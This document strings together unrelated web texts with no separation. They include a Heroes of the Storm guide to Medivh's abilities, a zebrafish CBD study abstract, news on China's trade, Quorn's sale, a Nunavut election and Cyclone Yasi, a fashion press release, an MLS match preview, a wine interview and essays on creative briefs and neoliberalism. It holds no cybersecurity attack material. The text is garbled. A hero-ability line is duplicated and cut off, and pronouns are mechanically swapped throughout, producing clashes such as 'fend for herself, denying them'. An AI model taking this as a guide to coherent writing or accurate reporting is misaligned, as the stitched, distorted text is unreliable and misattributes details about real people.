You can fly over the entire map.
Invulnerable while in Raven Form.
(Q) Arcane Rift
Fire off a bolt of energy in a line, damaging enemies in its path.
Hitting a Hero greatly reduces its cooldown.
(W) Force of Will
Project your will onto an allied Hero, making them Protected for 1.5 seconds, preventing all damage done to the target.
Target can still be trapped, frozen, or immobilized.
(E) Portal
Create a portal at Medivh's feet and at the target point that lasts for 6 seconds.
Allies can travel between the two portals while they are active.
These can currently be placed behind barriers.
currently be placed behind barriers. Unkillable
(R1) Poly Bomb
Polymorph a target Hero. After 1.5 seconds, any nearby Heroes are also polymorphed.
This ability can chain indefinitely.
(R2) Ley Line Seal
Fire off a blast of energy down the ley lines, putting any enemy Heroes in its path in Stasis for 3 seconds.
[youtube id=”zRZpyKT7ae0″ align=”center” mode=”normal” autoplay=”no” maxwidth=”800″ grow=”no”]
Talents
[youtube id=”a_VXcOd6lyo” align=”center” mode=”normal” autoplay=”no” maxwidth=”800″ grow=”no”]
What do you think about Medivh and their “game breaking” mechanics? Do you think they will become a major asset to any team?
Chromie Reveal – Heroes of the Storm
Season 1 and Ranked Play Revamp – Heroes of the Storm
Cannabidiol (CBD) has been investigated in a wide spectrum of clinical approaches due to its psychopharmacological properties. CBD has low affinity for cannabinoid neuroreceptors and agonistic properties to 5-HT receptors. An interaction between cannabinoid and purinergic receptor systems has been proposed. The purpose of this study is to evaluate CBD properties on memory behavioral and locomotor parameters and the effects of pre-treatment of adenosine receptor blockers on CBD impacts on memory using adult zebrafish. CBD (0.1, 0.5, 5, and 10 mg/kg) was tested in the avoidance inhibitory paradigm and anxiety task. We analyzed the effect of a long-term caffeine pre-treatment (~ 20 mg/L — four months). Also, acute block of adenosine receptors was performed in co-administration with CBD exposure in the memory assessment. CBD promoted an inverted U-shaped dose–response curve in the anxiety task; in the memory assessment, CBD in the dose of 5 mg/Kg promoted the strongest effects without interfering with social and aggressive behavior. Caffeine treatment was able to prevent CBD (5 mg/kg) effects on memory when CBD was given after the training session. CBD effects on memory were partially prevented by co-treatment with a specific A 2A adenosine receptor antagonist when given prior to or after the training session, while CBD effects after the training session were fully prevented by adenosine A 1 receptor antagonist. These results indicated that zebrafish have responses to CBD anxiolytic properties that are comparable to other animal models, and high doses changed memory retention in a way dependent on adenosine.
Image copyright Getty Images
China's imports in August fell 14.3% in yuan-denominated terms from a year ago, while exports fell by 6.1%.
The steep fall in the value of imports reflects lower commodity prices globally, particularly crude oil.
The numbers mean China's monthly trade surplus expanded by close to 40% from the month earlier to 368bn yuan ($57.8bn; £37.7bn).
China recently revised down its 2014 economic growth from 7.4% to 7.3%, its weakest for almost 25 years.
In US dollar denominated terms, exports for the month of August fell 5.5% from a year earlier - slightly less than expected - while imports fell by 13.8%, leaving China with a surplus of $60.24bn.
Currency conversion factors based on US dollar and Chinese yuan movements over the last year mean some official numbers from the mainland are now reported in both currencies.
A fall in both import and export figures had been expected as China's economy slows, though analysts said the drop in imports was greater than forecast.
"Chinese investors are now poised to expect a slew of weak economic data ranging from foreign trade to PMI [purchasing manager's index] to industrial output," said Xiao Shijun, an analyst at Guodo Securities in Beijing.
But they said investors were "no longer nervous about relatively poor figures. So unless there are fresh surprises on the downside, market impact will be limited".
Digital and on-street campaign celebrated the launch of a new fashion subscription service
1 2 3 4 5 The Style Box launch: arrive in style experience Curating trends from the runway Spotlight designer in the Style Box: Shield & Honor jewelry Spotted: Street Style at NYFW The Style Box by Socialbliss
End
-- Socialbliss, a community of fashion insiders delivering inspiration online and through monthly subscription, today wrapped up its discovery campaign of The Style Box at Fall/Winter 2014 New York Fashion Week. To celebrate the launch of its new fashion subscription service, Socialbliss curated a multi-faceted consumer experience on the streets of New York and online that delivered the on-trend, stylish introduction of The Style Box. The entire concept of #thestylebox at NYFW included:Socialbliss identified and photographed notable street style from influencers, trendsetters and fashion week attendees as contenders of the brand's first award recognizing “The Best Style” among the fashion industry's most elite. A version of a “red carpet” was also rolled out for all “The Best Style” contenders, which can be spotted and voted here: www.socialbliss.com/ newyorkfashionweek In partnership with Gett, a black car application for iPhone and Android, Socialbliss provided luxury black car service rides for fashion week attendees between major show locations. Elevating the luxury experience even further, each of the co-branded SUVs were stylized inside with special amenities, such as The Bullet Necklace from emerging jewelry designer Shield & Honor and on-trend clutches, all part of Socialbliss'Rockstar themed The Style Box.The #gettstylebox rides hosted influential fashion bloggers like Sydne Summer and celebrities like Jeannie Mai to experience products and discover new designers inside The Style Box.To introduce another stylish experience of The Style Box, Socialbliss surprised a woman unaffiliated with fashion week with a mini makeover in a #gettstylebox ride and transformed them from normal to fab with key trend items from The Style Box, underscoring the fact that style can easily be amplified with a few statement accessories. Video teaser can be seen here and the full video will be released on www.socialbliss.com soon.“To celebrate the launch of The Style Box, we set out to curate a real life discovery experience of The Style Box for the fashion conscious community of influencers, bloggers, trendsetters and stylists at New York Fashion Week,” said Jennie Huynh, CEO of Socialbliss. “As a platform of and for fashion influencers, our community looks to us for style inspiration. We're thrilled to deliver this every month through our new subscription service as we work independent designers to introduce the latest trends and emerging products.”The Style Box can be reserved by invitation only at www.socialbliss.com/ style-box . Each Style Box is valued over $100 - $200 and is available for $39.95 a month.Independent designers interested in product inclusion in The Style Box, contact kim@socialbliss.comFollow the conversations at #thestylebox and #gettstylebox.###Socialbliss is a creative community of global fashion insiders, curating the most exciting fashion trends from around the web. Connecting online inspiration with actual products, Socialbliss provides a marketplace for women to buy and share their fashions, as well as experience cutting-edge fashion trend items through its monthly The Style Box subscription. The Style Box delivers hand-selected designer, beauty and lifestyle products, giving women the key accessories to be on-trend, every single month. www.socialbliss.com
A playable demo of Studio Ghibli's PlayStation 3 game Ni No Kuni, which is bound for the U.S. early next year, made it to the Tokyo Game Show this week — and it looks absolutely gorgeous.
Studio Ghibli, the animation film studio behind “Spirited Away” and “Howl's Moving Castle,” is leading the animation for the game. It has the studio's trademark animated style written all over it, down to crazy-looking creatures and vibrant, green worlds. The whole game evokes the same kind of style Hayao Miyazaki imbued in their best animated films, such as “Nausicaa of the Valley of the Wind.”
Level-5, a Japanese developer responsible for the Nintendo DS puzzle series Professor Layton and the Dark Cloud, is developing the game. It's an action-oriented role-playing game that features the main character using a magic book to draw spells. Studio Ghibli began working on animation for the game back in 2008.
Ni No Kuni, or “Another World,” came out on the Nintendo DS last year in Japan, but a localized version never made it to the United States. The Nintendo DS game was well-received in Japan and picked up a 38 out of 40 from Weekly Famitsu, a popular game review magazine in the country. It was one of the best-selling games in Japan when it first came out.
It's rare that a game like this — which is geared toward an audience that likes shows with stylized Japanese animation — makes it to the United States. But Studio Ghibli has experienced a lot of success with its movies, which often end up as theatrical releases with top-billed voice actors. Liam Neesan, nominated for best actor for their role in Schindler's List, was a voice actor for Studio Ghibli's latest film “Ponyo.”
You can check out a video of the playable demo at the Tokyo Game Show below:
Thanks RedSunGamer
The Liberal party's Hunter Tootoo will be Nunavut's next MP, after unseating Conservative cabinet minister Leona Aglukkaq.
Tootoo had captured almost half of the votes, with just five out of 61 polls yet to report. They were followed by the NDP's Jack Anawak with 28.6 per cent out of 11,147 ballots counted. Aglukkaq was in third place with 23 per cent.
"It feels great," said Hunter Tootoo, surrounded by boisterous red-clad Liberal supporters at Iqaluit's Elks Lodge where they held their election night party. "Just feel like, wow, I'm excited."
Tootoo's supporters were all smiles as the Liberal wave flooded across the country.
"Time for a change," said Pitseolik Alainga, a Liberal supporter. "We've been waiting for change for a long, long time."
Tootoo said their first order of business will be to tackle the controversial Nutrition North food subsidy program.
"That effects everyone across the territory," said Tootoo. "Try to make some improvements through the review and expansion of that as quickly as possible."
Surprise return to politics
Tootoo made a surprise re-emergence in politics almost two years after announcing they wouldn't seek a fourth term as an MLA in Nunavut's 2013 general election.
For some, their candidacy as a Liberal came as an additional surprise. In 1997, they ran for the federal NDP in the riding of Nunatsiaq, a predecessor to the Nunavut riding. They finished third in that election, losing to Conservative runner-up Okalik Eegeesiak and Liberal winner Nancy Karetak-Lindell.
As the MLA for Iqaluit Centre from 1999 to 2008, Tootoo was well-known for their vocal criticism of cabinet. In 2008, they were appointed to cabinet, where they held several portfolios before becoming Speaker of the House in 2011.
Tootoo joined Canadian North after leaving federal politics. They were appointed chair of the Nunavut Planning Commission in January this past year.
As a unilingual candidate running in a bi-lingual riding, many believed that Tootoo's inability to communicate directly with Inuktitut speakers would be a severe disadvantage against Aglukkaq and Anawak who are both bi-lingual candidates.
Liberal leader Justin Trudeau visited Iqaluit as part of their campaign earlier this month. They used that visit to stress their party's commitments to the North including addressing the high cost of living in the region.
Liberal promises for the North
The Liberals have promised to add $40 million to the Nutrition North food subsidy program over the next four years and to work with Northern and remote communities to ensure the program is effective and transparent.
The party has also made promises to increase the Northern Residents Deduction by 33 per cent and index the benefits to keep pace with inflation. The indexed rate would be higher than the Canadian average — which is about one per cent per year.
It seems that Cisco's (CSCO) efforts to hit back at patent trolls have hit a potentially fatal roadblock. Although the networking equipment vendor last year decided to go on offense against firms that buy patents in bulk and sue other companies for infringement despite not making any products of their own, the Wall Street Journal reports that a federal court has shot down one of Cisco's first major attempts to go after an alleged patent troll. According to the Journal, U.S. District Judge James F. Holderman this week “that the aggressive licensing strategy used by [patent holding firm] Innovatio IP Ventures LLC against Cisco customers is protected by the U.S. Constitution.”
Cisco last year filed a complaint against the Chicago-based Innovatio for allegedly using “misleading, fraudulent and unlawful” tactics in their attempts to extract patent royalties, including allegedly sending threatening letters to Cisco's customers and “allegedly paying witnesses for testimony and documents in order ‘to overcome fatal shortcomings' in patent-infringement claims.” At the time, Cisco general counsel Mark Chandler accused firms such as Innovatio of engaging in “shakedowns” of legitimate companies and vowed to “make them liable for racketeering.”
While I was looking in the source of Battlelog, I found a game called BFH. I went into the CSS file for BFH and found some images that relate to this game.
To start off, this is the logo:
And the short logo:
Next, we have some footage:
The background is not that surprising:
The following classes will be present: Operator, Mechanic, Enforcer, Professional
Operator:
Mechanic:
Enforcer:
Professional:
A new Blood Money game mode:
Another game mode called Heist:
This is probably the yet to be announced SWAT game, these are the badges for the teams:
SWAT:
THIEVES:
Update 1:
These are the awards you can earn:
These are the weapons:
And the weapon accessories:
And their icons:
Vehicles:
Vehicle unlocks:
Update 2:
The game will probably be developed by Visceral as I have found an image of the Visceral logo in the assets, which is not used anywhere:
With a black background that makes:
Update 3: Battlefield Hardline has been confirmed by EA, seeing their official website: http://www.battlefield.com/hardline. It will be unveiled at E3 on June 9th 2014 at 12:00PM PDT.
Have you ever wondered how much it would cost to buy an average piece of land in your state 40 years ago? Have a look at our new animated map to find out.
Using data from the Lincoln Institute of Land Policy, we put together a series of maps showing the changes in average land values from 1975-2015 in each state. Overall, the trend is toward increasing land value, but there are exceptions.
*Land value = Total Home Value - Structure Cost
Results
In 1975, all of the 48 contiguous states and DC had average land values below $15,000. But in 1976, starting with California and followed by other western states and some of the northeastern states, average land values began to rise above $15,000. Connecticut and California were the first states with average land values exceeding $140,000 – in 1988 and 1989, respectively. By 1999, most states had average land values in excess of $15,000, with only the central states and Alaska remaining below the $15,000 mark.
From 2000-2007, land values rapidly appreciated. Many states had average land prices greater than $140,000 in 2007. However, from 2008-2011, corresponding with the financial crisis, a drastic drop in land values across the US occurred. The sharpest price cuts were in Nevada, Arizona, and Florida. Only five states retained average land values greater than $140,000.
Since 2012, land values have recovered, but not quite to the same levels as in 2007. Land values in a handful of states (Oklahoma, Mississippi, West Virginia, and New Hampshire) remain below $15,000, despite 40 years of inflation.
Methodology
The average land value is distinct from home value and structure cost: land value is determined by subtracting the structure cost from the total home value. The data behind the interactive map are estimates for 50 US states and DC of the prices and quantities of residential housing in nominal dollars (not adjusted for inflation). Average land values range from $0-$15,000 (colored green) to $140,000-$700,000 (colored red).
Summary
While average land prices in the US have increased over the last 40 years, there have been fluctuations along the way. Most of the price growth has occurred in western and eastern states, with the central states experiencing less appreciation in land value. For some states that continue to have average land values below $15,000, it is safe to assume that land values (in real terms) have actually decreased since 1975.
Sign up below for a future update from HowMuch on the release of its super-detailed cost of living analysis, based on geography and demographics
Image copyright Quorn
The meat substitute company Quorn Foods - advertised in the UK by Olympic Gold winner Mo Farrah - has been sold to Monde Nissin of the Philippines for £550m ($831m).
The company was put up for auction earlier this month and attracted interest from global food companies including Danone and chip giant McCain.
Quorn, a meat substitute made from fungus, is produced in North Yorkshire.
The company expects to increase the number of people employed at its sites.
Quorn is sold on its own for use in recipes at home or in ready meals and products that mimic items such as burgers and sausages.
It is available in 15 countries.
Quorn's chief executive, Kevin Brennan, said the deal would help the business grow: "We have an ambition to be the world leader in meat alternatives, ultimately creating a $1bn business. Monde Nissin... provides the capability to expand the brand into Asia."
Quorn Foods has around 620 employees on three UK sites and internationally: Stokesley in North Yorkshire, Billingham on Teesside and Methwold in Norfolk, as well as Frankfurt in Germany, and Chicago in the US.
COLUMBUS CREW vs NEW YORK RED BULLS
COLUMBUS CREW STADIUM, Columbus, Ohio
April 7, 2012 (WEEK 5, MLS Game #39)
3 p.m. ET (Univision Deportes; FS-OH; MSG)
A key Eastern Conference clash is ahead on Saturday afternoon when the Columbus Crew entertain the New York Red Bulls at Crew Stadium. The Red Bulls have been the hottest team in MLS the last couple of weeks, scoring nine goals in that time, last in a 5-2 home win against Montreal. The Crew are coming off back-to-back shutout victories, defeating Toronto FC 1-0 on the road last weekend.
REFEREE: Mark Kadlecik. SAR (bench): Chris Strickland; JAR (opposite): Jeff Muschik; 4th: Allen Chapman
MLS Career: 17 games; FC/gm: 24.1; Y/gm: 3.5; R: 5; pens: 6
DOWNLOAD FULL GAME GUIDE (PDF)
INJURY REPORT:
COLUMBUS CREW -- OUT: FW Ben Speas (sports hernia rehab); DF Rich Balchan (sports hernia rehab); DF Julius James (R shoulder surgery rehab); FW Tommy Heinemann (L knee internal injury); DOUBTFUL: DF Carlos Mendes (R hamstring strain); QUESTIONABLE: MF Danny O'Rourke (L ankle)
NEW YORK RED BULLS -- OUT: FW Juan Agudelo (L knee surgery recovery); QUESTIONABLE: DF Wilman Conde (groin strain)
INTERNATIONAL ABSENCES: none
SUSPENDED: none
HEAD-TO-HEAD
ALL-TIME (52 meetings): Crew 23 wins, 62 goals ... Red Bulls 22 wins, 68 goals ... Ties 7
AT COLUMBUS (26 meetings): Crew 14 wins, 36 goals ... Red Bulls 9 wins, 33 goals ... Ties 3
RETURN MATCH: 9/15: New York Red Bulls vs. Columbus Crew, 7 p.m.
LAST YEAR (MLS):
3/26: CLB 0, NY 0
6/4: NY 1, CLB 1 (Ballouchy 9 - Balchan 90)
The Crew are unbeaten in their last four meetings with New York. The teams played to a pair of draws in their two meetings a year ago; Columbus won both meetings in 2010.
New York hasn't won in Columbus since a 2-0 win July 19, 2006. The Crew have won five of the seven meetings since on their home ground, with two draws.
Coaches record: Robert Warzycha vs. NY: P8 W4 L2 D2 ... Hans Backe vs. CLB: P4 W0 L2 D2
COLUMBUS CREW
The Columbus Crew made it two wins in a row after a week off, maintaining their unbeaten record at BMO Field with a 1-0 victory against Toronto FC on Saturday afternoon. The Crew sit in a four-way tie for second place in the Eastern Conference with 6 points from 3 games.
LAST MATCH
The Crew nearly took the lead just before halftime, when TFC center back Ty Harden was ruled to have fouled Olman Vargas near the end line in the 42nd minute. Milovan Mirosevic stepped up to take the spot kick, driving a shot low and to the left, but goalkeeper Milos Kocic dove to deflect it for a corner kick.
Still, Columbus took the lead in the 56th minute when Bernardo Anor hammered home a shot from the center of the box after TFC couldn't clear their lines. Anor charged through the midfield and into the box after a turnover by Julian de Guzman. Defender Logan Emory attempted to clear the ball, but it deflected back to Anor, who drove a shot past Kocic.
Crew head coach Robert Warzycha made one change to the team that recorded a 2-0 win against the Montreal Impact at Columbus Crew Stadium. Eric Gehrig came into central defense in place of Danny O'Rourke.
COLUMBUS CREW (4-1-3-2): Andy Gruenebaum - Sebastian Miranda (Josh Williams 79), Chad Marshall, Eric Gehrig, Shaun Francis - Kirk Urso - Eddie Gaven, Milovan Mirosevic, Bernardo Anor (Ethan Finlay 85) - Emilio Renteria (Aaron Schoenfeld 80), Olman Vargas.
TEAM NEWS
The Crew have reeled off back-to-back shutouts after their season-opening 2-0 loss in Colorado. Last season, Columbus posted four consecutive shutouts following a season-opening 3-1 loss at D.C. United.
"We stress team defending first and if we can shut the other team down we can create our own chances and I think we are good enough going forward to get one on the road and hold on," said goalkeeper Andy Gruenebaum.
The Crew were forced into a change just hours before kickoff when Danny O'Rourke couldn't overcome an ankle injury and Eric Gehrig stepped into central defense.
"Obviously, he's a great professional and it's very encouraging that we have players like this on the bench that can step anytime and have a great performance," head coach Robert Warzycha said. Said Gruenebaum: "We have a couple guys that could fill in that spot and Eric did a great job today and it goes to show you how much depth we have on the team."
A week after converting a penalty kick against Montreal for their first MLS goal, Milovan Mirosevic saw their spot kick in the first half saved by Toronto FC goalkeeper Milos Kocic.
"(Mirosevic) is a great professional because they know the last thing that you want is for the missed penalty kick to affect the game. For a lot of players it's difficult to overcome," head coach Robert Warzycha said. "His game didn't change. They were the same Milo as they were in the first minute. Because they won that ball, I am not surprised. That is what they do on the field, and that is why they are here."
For Bernardo Anor, it was their second career MLS goal, first hitting the net last June 18 in a 2-0 win in Houston.
"That's what we asked Bernardo to do all the time," Warzycha said. "If you get the ball, go forward instead of trying to find the pass." Said Anor: "It wasn't a perfect touch at first, but by continuing the play, I got the rebound and I finished it pretty well."
Dilly Duka made their first appearance since suffering a hamstring injury in the season opener vs. Colorado, playing 30 minutes in the reserves match on Sunday.
"There were no signs of the injury or lack of fitness. I was happy with the minutes that (Duka) played," Warzycha said. "We didn't want to push them too far, but overall it was very good."
NEW YORK RED BULLS
The New York Red Bulls continued their impressive attacking ways at Red Bull Arena, rolling to a 5-2 win against the MontrÈal Impact on Saturday afternoon. The Red Bulls are in a four-way tie for second place in the Eastern Conference, with 6 points from 4 games.
LAST MATCH
The Impact took the lead after just 19 minutes, when a bouncing ball got away from New York center back Markus Holgersson and allowed Sanna Nyassi to race onto it and fire home easily from close range.
New York equalized nine minutes later when Thierry Henry headed home a beautiful cross from Rafa Marquez. The Mexican international was given plenty of space on the right side and they picked out Henry, who made a well-timed run.
But the expansion side were back in front in the 38th minute. Justin Mapp received a pass on the left flank and was allowed time and space to drive across the top of the box, firing a low shot that beat goalkeeper Ryan Meara inside their right post.
Yet the hosts pulled level once again in first-half stoppage time after Matteo Ferrari was whistled for a foul on Dax McCarty inside the area. Kenny Cooper claimed the spot kick and scored with a shot down the middle of the goal.
The Red Bulls took the lead in the 56th minute. A pass that was picked off by McCarty, and they found Henry at the top of the box. Henry turned and fired a pinpoint shot inside the near post past Donovan Ricketts, who was at full stretch.
New York built on their lead in the 72nd minute through a finish from substitute Mehdi Ballouchy that was set up by Henry. Solli whipped in a low cross from the right that the veteran striker flicked on to Ballouchy, who got a slight touch on the ball to put it in back of the net.
Henry then capped the scoring and recorded their first hat trick with the Red Bulls a minute before the end, knocking in a rebound after Ricketts spilled a shot from Cooper.
Red Bulls head coach Hans Backe made no changes to the team that strolled to a 4-1 defeat of the Colorado Rapids at Red Bull Arena.
NEW YORK RED BULLS (4-4-1-1): Ryan Meara - Jan Gunnar Solli, Markus Holgersson, Wilman Conde, Roy Miller - Dane Richards, Rafa Marquez (Teemu Tainio 46), Dax McCarty (Brandon Barklage 90), Joel Lindpere (Mehdi Ballouchy 69) - Thierry Henry - Kenny Cooper.
TEAM NEWS
This was first published on 26 February on Purple Pages but we are re-publishing it today as part of our new Throwback Thursday habit since the evolution of California wine is currently so much discussed online
There's something about pontificating far from home that loosens the tongue. It certainly happens to me, and it was notable that when Christian Moueix of Bordeaux presented a range of their Napa Valley wines Dominus at Corkbuzz in New York last October (see Moueix's dire predictions on Bordeaux 2013 published on Monday), they were delightfully forthright, more so it seemed to me than when in their office in Libourne. They touched on the failings of their Napa neighbours, the brett in their wines, 'crazy' alcohol levels, wines that taste of prunes, the virus threat, reverse osmosis and the foolishness of hillside planting. I even have the following quote written down, which is a mite inflammatory: 'excessive temperatures in Napa Valley make it a challenge for the wines to belong on a world class level'.
We began with a brief history of the much-discussed Dominus ('is it irredeemably French?' is one angle; another at one time was criticism of the series of portraits of Moueix themselves on the original labels). The first vintage was 1983, made at the Rombauer winery with fruit from the Napanook vineyard as part of a joint venture with the daughters of John Daniel, the old owner of Inglenook. When the time came, in 1997, to build their own winery on the vineyard just north of Yountville on the west side of Napa Valley, construction decisions 'brought some tension because of a difference of taste', as they put it, so they bought them out in January 2005.
Christian and their very artistically aware second wife Cherise chose the world-famous, cutting edge Swiss architects Herzog and de Meuron. 'Now I'm surprised I took such a risk', Moueix told us, about the extraordinary box-like building that has what are effectively rocks inside chicken wire instead of walls, 'but in the end I am pleased by how well it is integrated into the landscape - and it's very functional.' We chose it as our illustrative winery in the fifth edition of The World Atlas of Wine.
They said that in 1994 and 2001 they knew straightaway that these were great vintages, adding, 'I'm hoping to have the same emotion about 2013'. They admitted that their 1994 'has a bit of brett, which makes it more interesting but more difficult to appreciate. [Celebrated northern California winemaker] Dave Ramey says most burgundy has brett and that it adds to the complexity. I don't aim to make bordeaux in Napa but you can bring a bit of culture, in both senses. I try not to pick too late. Overripeness is the single most undesirable thing in Napa. When I arrived I said two things:
'Firstly I was determined to have dry farming (apart from the very young vines). This is not insignificant in the Napa climate which often has 100 ºF days. There can be no rain at all from early May to late October.' [And even less in 2013 - see Alder's recent report - JR]. 'Thanks to our ability to measure humidity, we now know exactly when we risk sunburn. If humidity falls below 50%, then it's dangerous, so we're experimenting with misting systems. Dry farming encourages deep roots and is key for expressing terroir. I have not had the success I had hoped for to convince my friends to give up irrigation, They say the vines will die. No, they come from the Caucasus and can withstand anything. Write about dry farming please. Unirrigated vines will naturally find their equilibrium and won't need to be picked as late as irrigated vines. People accuse us of avoiding risks by picking early but it's a question of natural equilibrium. Irrigation is one of the reasons you get these crazy alcohol levels in Napa. I'm obsessed by dry farming even 30 years after arriving in Napa Valley.
'The second thing I was determined not to do was acidification. I have never acidified a single vat in 30 years. Of course if you get overripe fruit you need to acidify with tartaric acid, but it combines with tannins to make the wine taste very hard.
'In Napa Valley you hear a lot about ecology and an organic approach. But even though we don't have enough water, I see people irrigating within hours of picking. There is something wrong here.'
I think they must have realised they were sounding off a bit because they then added, 'I mean this not as a criticism but a helpful observation. There are some parts of Napa, especially on top of the hills, where I don't know the terrain. Perhaps they do need irrigation there.
'We never look for a fruit bomb. I hate the idea of a fruit bomb. Remember, before vines arrived in the Napa Valley there were prunes. The dominant flavour in Napa wines today is prune - it's natural. It's not an unpleasant taste but it's extreme. Black fruits is the end. It is never my goal to make wines that taste like prunes. The main problem in Napa is virus - it's the same all over the world. Why? Because people are stupid. You have the same culture in the same place for too long, The soils are saturated by microbes, etc. You should really let the soil lie fallow every six or seven years. Or you plough and (illegally) disinfect.
'Reverse osmosis has changed winemaking around the world. I hate it and have never used it. It provides a quick fix for any mistake you have made and provides an artificial equilibrium. It's unnatural - like plastic surgery for correcting faults which shouldn't have occurred. My objection is philosophical. The tendency in Bordeaux is gravity-fed wineries. The idea is that the clusters should arrive in a virginal state but, for instance, at Quintessa they take gravity to such an extreme that they ignore the beautiful Italian peristatic pumps which treat grapes and musts so delicately.'
They admitted that they had made mistakes. 'Thirty years ago one vat turned to vinegar. There is not a producer in Bordeaux who has not lost one vat, maybe one whole vintage, to volatile acidity.
'There is an interesting correlation between the amount of winter rain and the (reduced) quality of the subsequent vintage in Napa Valley. We have very few disasters in Napa. Okay, 2011 was too rainy and occasionally too hot. But overall the climate is much easier than Bordeaux's. In Napa the current obsession is with elevation and hillside sites. (We see millionaire's buildings there which are usually ugly.) I think hillside vineyards are a big mistake. They need irrigation and anyway it's not a natural habitat for vines. We will see what they become in a century. For me there is a danger at those altitudes.
'We are described as valley floor but the real valley floor is just the flat bit by the river that is flooded occasionally. We're actually on a slope that has natural drainage. Dominus is on the volcanic foothills of the Mayacamas (they call it gravelly locally but for me it's not gravelly at all).'
Another distinguishing feature of Christian Moueix is their refusal to play any sort of varietal game. In a valley whose press kits are littered with grape percentages, they say defiantly, 'we produce a wine whose assemblage will never be divulged even under torture - what does it matter?'
They will admit to having a problem with Cabernet Franc: 'It's difficult to get it to perfect ripeness. The clones are very questionable. It gets ripe only every other year.'
They wanted to discuss over-extraction too: 'After fermentation how do you decide when to separate the must from the skins? You taste daily and if you're serious, when you start to taste marc then you drain the must. But some people go for 15, 20 days or more so they go from red to black fruits. Today there are far too many wines that are overripe and over-extracted.
'In 2013 we finished picking on 26 September in Napa. They told how someone described as 'a friend' on the plane from France to New York the day before, 23 October, had told them that their California clients had just finished picking in Napa. Michel Rolland perhaps?
I have had the pleasure of tasting Dominus regularly almost from its inception. (I remember keeping the first two winemakers waiting a shamefully long time as I drove back to the Rombauer winery from the Sierra Foothills.) It does seem to be going from strength to strength, though is always highly distinctive.
A few weeks back I got to see design icon Michael Wolff speak about youthful thinking, and somehow they ended up talking about their definition of a creative brief. I was struck by the distilled simplicity of how they put it:
A creative brief is the best chance someone has to explain what they want from you.
So simple. So obvious. Maybe even disappointingly obvious, coming from someone so smart and experienced. Except there are two ways to look at it.
A creative brief is the best chance someone has to explain what they want from you. But most importantly, a creative brief is the best chance someone has to explain what they want from you. A concrete request born out of a possibility. And possibilities imply alternatives.
I'm currently reading “Decisive” by Dan and Chip Heath, where they explore among others the main flaws in our decision systems. Among them, emotional attachment, confirmation bias or simple narrow framing. But the research is clear: biologically, we suck at defining problems.
So why should we consider that the very best brief we can come up with is the very best brief there is?
Strategy happens when we have infinite alternatives and finite resources. By definition it implies choices and therefore trade-offs, making its outcome never guaranteed (and often unexpected).
A briefing works the same way: we trade focus for costs of opportunity, which means there's a chance that the briefing might be wrong.
It takes a lot of humility to admit this, arguably a rare trait in the marketing and advertising industry. It makes sense: our job, broadly speaking, is to prove that we or our clients are better than our competitors. We thrive because we're not afraid to think like a predator.
And yet, it's that same level of humility that might make us better at our jobs. By accepting that there is a chance we might be wrong in how we frame a problem, we're not opening ourselves to criticism, we're opening ourselves to alternative. In a world of “get shit done”, problems have an attention deficit and poorly defined problems inevitably come back to bite us in the ass.
In short, our egos are often in the way of our best work.
A good briefing, then, is also the result of how much humility we put into it. Only by acknowledging our natural inability to frame a problem can we allow ourselves to be open to new interpretations, better questions, and more interesting (and often unexpected) solutions.
Or creativity, as some people call it.
Left critics of neoliberalism—or just plain old unregulated capitalism—often cite Margaret Thatcher's famous declaration “There is no such thing as society” as evidence of neoliberalism's hostility to all things collective. Neoliberalism, the story goes, unleashes the individual to fend for herself, denying them the supports of society (government, neighborhood solidarity, etc.) so that they can prove their mettle in the marketplace.
But these critics often ignore the fine print of what Thatcher actually said in that famous 1987 interview with, of all things, Woman's Own. Here's the buildup to that infamous quote:
Who is society? There is no such thing! There are individual men and women and there are families…
It's that last phrase (“and there are families”) that's crucial. Contrary to popular (or at least leftist) myth, neoliberals are not untrammeled individualists. In many ways, they're not that different from traditional conservatives: that is, they see individuals embedded in social institutions like the church or the family or schools—all institutions, it should be said, that are hierarchical and undemocratic.
Thatcher isn't alone in this. For all their individualist bluster, libertarians—particularly those market-oriented libertarians who are rightly viewed as the leading theoreticians of neoliberalism—often make the same claim. When these libertarians look out at society, they don't always see isolated or autonomous individuals; they're just as likely to see private hierarchies like the family or the workplace, where a father governs their family and an owner their employees. And that, I suspect (though further research is certainly necessary), is what they think of and like about society: that it's an archipelago of private governments.
Here's Milton Friedman in Capitalism and Freedom:
The ultimate operative unit in our society is the family, not the individual. (32; also see 13)
And here's Richard Epstein in a piece called “Libertarianism and Character” from a collection of essays about conservatism, edited by Peter Berkowitz:
It would be a mistake of major proportions to assume that legal rules are a dominant force in shaping individual character; family, school, and church are much more likely to be powerful influences. The people who run these institutions will use their influence to advance whatever conception of the good they hold, no matter what the state of the law.
I've been thinking a lot about these texts as the boys debate neoliberalism versus social democracy, and what neoliberalism is all about. What often gets lost in these debates is what I think is the real, or at least a main, thrust of neoliberalism, according to some of its most interesting and important theoreticians (and its actual practice): not to liberate the individual or to deregulate the marketplace, but to shift power from government (or at least those sectors of government like the legislature that make some claim to or pretense of democratic legitimacy; at a later point I plan to talk about Hayek's brief on behalf of an unelected, unaccountable judiciary, which bears all the trappings of medieval judges applying the common law, similar to the “belated feudalism” of the 19th century American state, so brilliantly analyzed by Karen Orren here) to the private authority of fathers and owners.
ALI MOORE, PRESENTER: Cyclone Yasi has claimed its first life and although another two people were initially reported missing, they've both been found safe and well.
The tragic news comes as residents begin the heartbreaking clean-up of hundreds of homes and businesses that were battered by the storm.
Many communities remain without power and safe drinking water.
But, as James Kelly reports, help and some essential supplies are starting to trickle through.
JAMES KELLY, REPORTER: Like many Far North Queensland coastal communities, Tully Heads, halfway between Cairns and Townsville, didn't stand a chance.
DAVID HUGHES, RESIDENT: Devastated. Yeah, devastation, just tears. Tears of just all the hard work that people have done. You know, you come down here and just everything's gone.
JAMES KELLY: On Wednesday night Cyclone Yasi, coupled with a storm surge, unleashed its fury, pounding hundreds of homes.
MAL MALLYON, RESIDENT: Yeah, pretty knocked up. Yeah and shell-shocked I suppose is a good word for it.
JAMES KELLY: As residents returned to their ruined homes, it was the Queensland Premier who delivered the news everybody feared.
ANNA BLIGH, QUEENSLAND PREMIER: We can confirm the first Cyclone-related death.
JAMES KELLY: A 23-year-old man died at Bambaroo, near Ingham, as they took shelter. They were using a power generator in a closed room.
BOB ATKINSON, QUEENSLAND POLICE COMMISIONER: Unfortunately there wasn't sufficient ventilation. They were found by a relative.
JULIA GILLARD, PRIME MINISTER: To see such a young person die like this is a real tragedy.
JAMES KELLY: At Cardwell there were fears one man was swept away by the storm surge. But they emerged from the mangroves today where they had been sheltering from the cyclone.
ANNA BLIGH: We have many, many communities that now are without any power which means that their water treatment plants are not able to work.
